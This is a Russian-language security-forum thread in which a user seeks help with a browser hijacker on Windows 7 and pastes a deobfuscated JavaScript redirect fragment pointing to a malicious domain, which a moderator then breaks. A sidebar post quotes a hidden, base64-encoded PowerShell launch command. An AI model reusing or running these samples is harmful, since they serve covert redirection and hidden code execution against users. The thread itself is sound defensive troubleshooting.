Перейти к содержанию
mesmer

Висит в интернет браузере

Recommended Posts

mesmer

Приветствую!

Компьютер через роутер, вроде даже с паролем на админку.

Видел мельком, но со слов было примерно так - в один день при работе в Win7 с IE 9 (обновления для компьютера последний раз ставились в октябре 12г.) при переходе или создании новой вкладки выходил всякого рода баннер , и собственно не дающий нормально закрыть страницу или предлагая подписку за смс, а то порой и пустая страница висит.

как понял запустили с диска антивирус - прогнали - вроде был троян, но после уничтожения его ерунда так и осталась.

Причем, стоит еще в системе Crome - таже напасть и с ним.

Сделали Windows update, adobe FP, прогоняли на подозрительные моменты MalwareBytes, AVZ, Gmer,UVZ, ну вроде чисто - реестр ключи,

Кстати, имелся hosts.ics, была в нем запись - для пробы его удалили, он появился после загрузки системы. Запись в # поставили.

Все осталось по прежнему.

Понимаю, что надо б логи подсобрать типа Hijack... :facepalm:

Но для быстрого "решения" пришлось поставить другой браузер, пока с ним вроде работает.

Сумбурно, но может есть вариации и кто сталкивался с этой ерундой (с пустого экрана страницы дернул это),:

|ismobile|midp|wap|winw|xda|up|var|navigator|userAgent|match|acs|||alav|alca||am

oi||audi|aste|avan|benq|bird|blac|blaz|brew|cell|cldc||cmd||dang|doco|eric|hipt|

i

nno|ipaq|java|jigs|kddi|keji|leno|lge|maui|maxo|mits|mmef|mobi|mot|moto|mwbp|nec

|

newt|noki|opwv|palm|pana|pant|pdxg|phil|play|pluc|port|prox|qtek|qwap|sage|sams|

s

any|sch|sec|send|seri|sgh|shar|sie|siem|smal|smar|sony|sph|symb|mo|teli|tim|tosh

|

tsm|upg1|upsi|vk|voda|w3cs|wapa|wapi|wapp|wapr|webc|browser|link|windows|ce|iemo

b

ile|mini|mmp|symbian|phone|pocket|mobile|android|pda|PPC|Series60|Opera|Mini|ipa

d

|iphone|if|document|location|href|httр://vnеbо.рrо/l=32411c1807600b4d0355175e07545e0b3513141c'.split('|'),0,{}));

cydox какой-нибудь посидел?

может делов на две минуты решение?

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Alex_Goodwin

Уберите вредоносную ссылку, по ней вбанчивают https://www.virustotal.com/ru/file/9b857a58...sis/1361986701/

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
Umnik

Побил ссылку.

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты
mesmer
mesmer вам сюда.

Прошу прощения, если навредил.

Странно, вроде антивирус стоит на том ПК из списка видящих заразу, причем как понял давно.

Буду разбираться. Благодарю!

Поделиться сообщением


Ссылка на сообщение
Поделиться на другие сайты

  • Сообщения

    • PR55.RP55
      Допустим: '%WINDIR%\syswow64\cmd.exe' /c powershell -nop -exec bypass -win Hidden -noni -enc aQBmACgAWwBJAG4AdABQAHQAcgBdADoAOgBTAGkAegBlACAALQBlAHEAIAA0ACkAewAkAGIAPQAnAHAAbwB3AGUAcgBzAGgAZQBsAGwALgBlAHgAZQAnAH0AZQBsAHMAZQB7ACQAYg... '<SYSTEM32>\rundll32.exe' <SYSTEM32>\FirewallControlPanel.dll,ShowNotificationDialog /configure /ETOnly 0 /OnProfiles 6 /OtherAllowed 0 /OtherBlocked 0 /OtherEdgeAllowed 0 /NewBlocked 4 "%WINDIR%\syswow64\windowspowersh... Было бы неплохо, если бы в Инфо. объекта. Прописывались данные по настройке  разрешений Firewall. + Отдельная категория по Firewall - что разрешено, что заблокировано.
    • SQx
    • SQx
      Спасибо,  как раз появился новый случай.
        DhcpDomain REG_SZ domain.name DhcpNameServer REG_SZ 192.168.1.1  
    • demkd
      ---------------------------------------------------------
       4.11.9
      ---------------------------------------------------------
       o Твик #39 теперь дополнительно включает отслеживание командных строк завершенных процессов, командные строки отображаются в окне информации.
         Только для Windows 8.1/Windows Server 2012 R2 и старше.  o WLBSCTRL.DLL теперь автоматически получает статус подозрительного файла.  o В окне информации сетевого адаптера (в разделе DNS) теперь отображается поле DHCP Domain при его наличии.  
    • PR55.RP55
      https://habr.com/ru/post/214953/ На подобное событие антивирус также может реагировать - если сервер будет в чёрном списке. Да и уязвимости...  
×